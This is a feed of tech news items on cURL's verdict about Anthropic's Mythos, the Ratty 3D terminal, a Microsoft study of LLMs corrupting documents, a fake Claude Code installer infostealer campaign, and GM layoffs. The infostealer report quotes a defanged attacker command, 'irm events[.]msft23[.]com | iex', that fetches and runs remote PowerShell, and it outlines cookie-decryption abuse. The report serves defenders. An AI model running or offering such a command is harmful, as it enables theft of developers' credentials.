Categories: Linux fréttir
Anthropic's Bug-Hunting Mythos Was Greatest Marketing Stunt Ever, Says cURL Creator
cURL creator Daniel Stenberg says Anthropic's hyped Mythos bug-hunting model found only one confirmed low-severity vulnerability in cURL, plus a few non-security bugs, after he expected a much longer list. He argues Mythos may be useful, but not meaningfully beyond other modern AI code-analysis tools. "My personal conclusion can however not end up with anything else than that the big hype around this model so far was primarily marketing," Stenberg said a blog post. "I see no evidence that this setup finds issues to any particular higher or more advanced degree than the other tools have done before Mythos." He went on to call Mythos "an amazingly successful marketing stunt for sure." The Register reports: Stenberg explained in a Monday blog post that he was promised access to Anthropic's Mythos model - sort of - through the AI biz's Project Glasswing program. Part of Glasswing involves giving high-profile open source projects access via the Linux Foundation, but while Stenberg signed up to try Mythos, he said he never actually received direct access to the model. Instead, someone else with access ran Mythos against curl's codebase and later sent him a report. "It's not that I would have a lot of time to explore lots of different prompts and doing deep dive adventures anyway," Stenberg explained. "Getting the tool to generate a first proper scan and analysis would be great, whoever did it."
That scan, which analyzed curl's git repository at a recent master-branch commit, was sent back to him earlier this month, and it found just five things that it claimed were "confirmed security vulnerabilities" in cURL. Saying he had expected an extensive list of vulnerabilities, Stenberg wrote that the report "felt like nothing," and that feeling was further validated by a review of Mythos' findings. "Once my curl security team fellows and I had poked on this short list for a number of hours and dug into the details, we had trimmed the list down and were left with one confirmed vulnerability," Stenberg said, bringing us back to the aforementioned number.
As for the other four, three turned out to be false positives that pointed out cURL shortcomings already noted in API documentation, while the team deemed the fourth to be just a simple bug. "The single confirmed vulnerability is going to end up a severity low CVE planned to get published in sync with our pending next curl release 8.21.0 in late June," the cURL meister noted. "The flaw is not going to make anyone grasp for breath."
Read more of this story at Slashdot.
Categories: Linux fréttir
Rodent-obsessed developer creates Ratty to bring 3D graphics to the command line
When you think of a terminal emulator, you imagine a command line interface filled with ASCII text and a prompt. However, one developer has reimagined the experience to include inline 3D objects and image support. Dubbed Ratty by its creator Orhun Parmaksiz for its 3D spinning rat cursor, the terminal window itself is a 3D canvas that supports sprites and 3D models, can render 3D drawings in real time, and even includes its own graphics protocol. “Terminal emulators are a big part of our daily lives as developers but yet we are not making enough innovations in that space,” Parmaksiz told The Register in an email. “With Ratty I hope to inspire others to experiment with terminals and push the limits of what they can do.” Parmaksiz wrote in his blog post introducing Ratty that he accomplished the whole thing using his own Rust terminal interface library, Ratatui, along with the Bevy game engine, also built with Rust. The aforementioned Ratty Graphics Protocol was created in order to register 3D assets and place them in an anchored terminal cell space. “Ratty separates terminal emulation from presentation: one side handles PTY I/O and terminal parsing, while the other turns the result into a GPU-rendered 2D or 3D scene,” Parmaksiz explained. “This allows for a lot of flexibility in how the terminal output is displayed (e.g. you can warp the whole damn thing).” Ratatui ends up serving as the terminal rendering layer, Parmaksiz explained, taking whatever the terminal state is, rebuilding it in its own buffer, and rendering said buffer onto a texture that is then rendered via Bevy. Given its design, be forewarned if you try to install and run Ratty: It’s going to eat up a lot of memory since it’s running a game engine. “I know, sacrificing 300 MB of RAM just to run a terminal emulator is a lot,” Parmaksiz said. “But everything comes with a cost, especially the spinning rat cursor.” Building the fourth temple Parmaksiz’s desire to push the limits of terminal emulators past their logical limits didn’t come from nowhere - he actually got inspiration from a source that some grey-hairs in the tech community might have been reminded of at the very beginning of this story: TempleOS. For those unfamiliar with TempleOS, it’s an operating system that was developed by the late Terry Davis, a schizophrenic, and arguably genius, software developer who believed he was building the OS at the command of God to serve as a digital Jewish Third Temple. Using TempleOS is an exercise in frustration given its confusing interface, not to mention deliberate constraints (Davis believed its 640x480 desktop, 16-color display, single-voice audio and other features were part of God’s commandment), but it also included a fascinating capability not seen in other OSes: first-class, insertable sprites on the command line. “I was blown away by the creativity and passion behind it,” Parmaksiz told us of TempleOS, noting that 3D command line sprites in the OS were his inspiration for Ratty. “I wanted to see how adopting that to a modern-day terminal emulator would look like and experimented with a couple of other things while I was at it. I'm super happy with the result!” Parmaksiz told us that a number of people instantly caught on to the TempleOS inspiration, and that the feedback has been overwhelmingly positive. That said, he also admitted that most people who’ve used it have been scratching their heads over an actual use case. “I think this will also clarify itself if we give it more time,” Parmaksiz said in his email. “I mean... I really would like to see a full-fledged CAD program in the terminal built with Ratty Graphical Protocol at some point!” Whether that’ll ever happen remains to be seen - this is purely a fun project for now and Parmaksiz isn’t even sure it’s in his personal time budget to continue to maintain. “I'm just testing the waters for now, but the reception has been amazing so far. I would be happy to continue development if people start using Ratty and start developing cool things with it,” Parmaksiz said, noting that the code is open and he’d be thrilled if others contributed. Parmaksiz has developed a Ratatui widget that enables devs to build applications that run in Ratty, like a temple runner knockoff. “My ultimate goal with Ratty is to explore the possibilities of what a terminal can be and inspire new ideas and projects in the terminal space,” Parmaksiz wrote in his blog post. “I believe these kinds of experiments are where creativity is born and I hope to spark some ideas for the future of terminals.” ®
Categories: Linux fréttir
Microsoft researchers find AI models and agents can't handle long-running tasks
Companies exploring automated workflows would be well advised to keep their AI agents on a short leash. Microsoft researchers have found that even the priciest frontier models introduce errors in long workflows, the very thing for which AI software has been pitched. Anthropic, for example, says, "Claude Cowork handles tasks autonomously. Give it a goal and Claude works on your computer, local files, and applications to return a finished deliverable." Redmond promotes similar usage, touting Microsoft 365 Copilot's ability to "Tackle complex, multistep research across your work data and the web." The Windows maker's scientists aren't so sure about that. Philippe Laban, Tobias Schnabel, and Jennifer Neville from Microsoft Research set out to study what happens when large language models (LLMs) are asked to complete multistep tasks. They recently published their findings in a preprint paper with a spoiler title: "LLMs Corrupt Your Documents When You Delegate." To test how LLMs handle long-running knowledge work tasks, the researchers devised a benchmark called DELEGATE-52. It simulates multistep workflows across 52 professional domains, such as writing code, crystallography, and music notation. It is a more taxing test than sorting a spreadsheet, a task that should be table stakes for any aspiring workflow agent. In the accounting domain, for example, the challenge involves a seed document that represents the accounting ledger of Hack Club, a nonprofit organization. The model is asked to split the seed document into separate category-based files and then to merge these chronologically back into a single file. "Our findings show that current LLMs introduce substantial errors when editing work documents, with frontier models (Gemini 3.1 Pro, Claude 4.6 Opus, and GPT 5.4) losing on average 25 percent of document content over 20 delegated interactions, and an average degradation across all models of 50 percent," the authors report. The authors found that LLMs did better on programming tasks and worse on natural language tasks. To be considered "ready" for a given work domain, the researchers set the bar at 98 percent or higher after 20 interactions. They only found one domain qualified: Python programming. For every other domain, the authors found LLMs fell short of "ready." "A per-domain breakdown of end-of-simulation scores reveals that models are not ready for delegated workflows in the vast majority of domains, with models severely corrupting documents (at least -20 percent degradation) in 80 percent of our simulated conditions," the authors state. The study found that "catastrophic corruption," meaning a benchmark score of 80 percent or less, occurred in more than 80 percent of model/domain combinations. The best performing model, Google Gemini 3.1 Pro, was ready for only 11 of 52 domains. In weaker models, degradation took the form of content deletion; in frontier models, it took the form of content corruption. And when errors occurred, they tended to happen all at once, resulting in the loss of 10 to 30 points in a single round-trip interaction, rather than accumulating over the entire test run. "The stronger models (Gemini 3.1 Pro, Claude 4.6, GPT 5.4) aren’t avoiding small errors better, they delay critical failures to later rounds and experience them in fewer interactions," the researchers observe in their paper. The Microsoft authors went on to test how agents – LLMs given access to file reading, writing, and code execution through a basic harness – handle the DELEGATE-52 benchmark. Tools in this instance didn't help. "The four tested models perform worse when operated agentically with tools than without, incurring an average additional degradation of 6 percent by the end of simulation," the authors observe, in reference to GPT-5.4, 5.2, 5.1, and 4.1. Given that task delegation is the whole point of an AI agent – if you wanted to do it yourself, you wouldn't have tried to automate the task – this casts a bit of a shadow on the AI hype train. An intern who corrupted a quarter of a document over a long workflow would be shown the door. Yet companies are showing AI the money: according to Deloitte, organizations are spending an average of 36 percent of their digital budgets on AI automation. That might make sense if arming LLMs with the tools to function as full-blown agents meant less document degradation. But that's not the case. The authors found "using a basic agentic harness does not improve the performance of LLMs" with regard to the DELEGATE-52 test and that LLM performance after two interactions doesn't reflect how models perform after 20, which they argue underscores the need for long-horizon evaluation. "Current LLMs are ready for delegated workflows in some domains such as Python coding, but not in other less common domains," the authors conclude. "In general, users still need to closely monitor LLM systems as they operate and complete tasks on their behalf." Yet they also note that LLMs have been getting better, pointing to the performance of OpenAI's GPT model family, which has seen its benchmark performance increase over 16 months from 14.7 percent to 71.5 percent. ®
Categories: Linux fréttir
Cookie thieves caught stealing dev secrets via fake Claude Code installers
An ongoing campaign steals developers’ secrets via fake Claude Code installers and other popular coding tools, according to Ontinue’s security researchers. The lure - as with several other infostealer attacks targeting developers over the past several months - mimics a legitimate one-line installer for an attacker-controlled command. In this case, the command is “irm https[:]//claude[.]ai/install.ps1 | iex”, and the lure replaced the destination host with “irm events[.]msft23[.]com | iex”. The payload is unique, and doesn’t match up with any documented malware family. It does, however, wreak havoc on developers exfiltrating decrypted cookies, passwords, and payment methods from Chromium-based browsers such as Google Chrome, Microsoft Edge, Brave, Vivaldi, and Opera. According to the threat hunters who documented the new campaign on Monday: “We publish for peer correlation rather than attribution.” The attacks also abuses the IElevator2 COM interface. This is Chromium’s elevation service used to handle App-Bound Encryption (ABE), specifically for encrypting and decrypting sensitive user data like cookies and passwords. Google introduced the new interface in January to protect Chromium-based browser data from cookie thieves, who used earlier ABE bypass techniques and commodity stealers that file-copied the SQLite databases holding cookies and saved passwords. However, crafty crooks (and security researchers) soon figured out workarounds to abuse IElevator2, as is the case with the newly spotted malware. The attack runs across three domains, all registered within six days of each other in April, and all fronted through Cloudflare. It relies on developers searching for “install claude code,” and selecting a sponsored result that leads to a lookalike Claude Code installation page. The page downloads and executes Anthropic’s authentic installer - but as Ontinue’s team found, the malicious instruction isn’t stored in the file itself, but instead rendered into the HTML of the landing page. “Automated scanners, URL reputation services, and any skeptical reviewer who simply curls the URL therefore observe clean PowerShell delivered from a Cloudflare-fronted domain bearing a valid Let’s Encrypt certificate,” the researchers wrote. “Victims, meanwhile, are presented with an entirely different command.” The pasted command redirects victims to an obfuscated PowerShell loader that injects a native AEB helper into a live browser process. The helper’s “exclusive purpose,” we’re told, is to invoke the browser's IElevator2 COM interface and recover the App-Bound Encryption key. The helper formats a pipe to exfiltrate sensitive data using Chromium’s legitimate Mojo naming convention for IPC pipes. It then attempts to use IElevator2 to decrypt developer secrets, but it falls back to the legacy interface on the Elevation Service alongside the legacy IElevator if the new one doesn’t work. Ontinue’s researchers published a full list of elevation-service identifiers, so be sure to check that out. And after receiving the ABE key from the helper, the PowerShell loader decrypts the local browser databases and sends the stolen data to an attacker-controlled server via an in-memory secure_prefs.zip archive. The malware hunters say that they compared the malware against published reporting for the several stealers - including Lumma, StealC, Vidar, EddieStealer, Glove Stealer, Katz Stealer, Marco Stealer, Shuyal, AuraStealer, Torg Grabber, VoidStealer, Phemedrone, Metastealer, Xenostealer, ACRStealer, DumpBrowserSecrets, DeepLoad, and Storm - and found no technical match. The closest is Glove Stealer, first documented by Gen Digital in November 2024, which also abuses IElevator via a helper module communicating over a named pipe. The orchestration model, however, differs from Glove in that it uses a “small native helper acting as a single-purpose ABE oracle, with all detection-visible activity pushed into PowerShell.” According to the research team, this split matters for defenders because "behavioral rule sets that look at the native PE in isolation will see nothing actionable,” as they wrote. “Detection has to land at the COM call and at the PowerShell layer.” ®
Categories: Linux fréttir
GM Cutting Hundreds of Salaried IT Workers As It Trims Costs, Evaluates Needs
GM is laying off about 500 to 600 salaried IT workers, mainly in Austin, Texas, and Warren, Michigan, as it restructures its technology organization and trims costs. "GM is transforming its Information Technology organization to better position the company for the future. As part of that work, we have made the difficult decision to eliminate certain roles globally. We are grateful for the contributions of the employees affected and are committed to supporting them through this transition," the automaker said in an emailed statement. CNBC reports: GM reported employing about 68,000 salaried workers globally as of the end of last year, including 47,000 white-collar employees in the U.S. Despite Monday's cuts, GM still is still hiring IT workers. The company has 82 open IT positions that include positions working in artificial intelligence, motorsports and autonomous vehicles, according to the automaker's careers website.
Read more of this story at Slashdot.
Categories: Linux fréttir
